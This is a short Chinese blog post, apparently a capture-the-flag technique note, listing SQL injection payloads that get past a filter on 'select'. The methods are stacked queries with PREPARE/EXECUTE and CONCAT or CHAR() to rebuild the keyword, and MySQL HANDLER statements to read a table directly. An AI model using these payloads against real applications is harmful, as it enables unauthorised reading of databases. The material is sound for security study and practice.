zoukankan html css js c++ java

几种绕过select过滤的姿势

预编译：

1、已知目标数据所在的具体库名表名，现在只差提取出来

payload：
-1';set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;

拆分开来如下
-1';
set @sql = CONCAT('se','lect * from `1919810931114514`;');
prepare stmt from @sql;
EXECUTE stmt;

其中：

set用于设置变量名和值
prepare用于预备一个语句，并赋予名称，以后可以引用该语句
execute执行语句
deallocate prepare用来释放掉预处理的语句


2、

payload：
1';PREPARE jwt from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE jwt;#

拆分开来如下：
PREPARE jwt from '[my sql sequece]';   //预定义SQL语句
EXECUTE name;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE name;  //删除预定义SQL语句

其中：

PREPARE name from @sql;   //预定义SQL语句
EXECUTE name;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE sqla;  //删除预定义SQL语句

HANDLER方法:

payload
1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#

handler table_name open ... //获取句柄

handler ... read first //读取第一行数据

handler ... read next //读取下一行数据

查看全文

相关阅读:
mysql 下计算两点经纬度之间的距离
 富爸爸财务自由之路
 Ubuntu16.04忘记MySQL5.7的root用户密码之解决方案
 Windowns下code: command not found
Linux下CRMEB环境搭建
 PHP无法使用curl_init()函数
 请在mysql配置文件修sql-mode或sql_mode为NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION
apache不能解析php之解决办法
 windows上hexo: command not found
SyntaxError: Non-ASCII character 'æ' in file csdn.py on line 7, but no encoding declared; see http://python.org/dev/peps/pep-0263/ for details

原文地址：https://www.cnblogs.com/cmredkulaa/p/14563311.html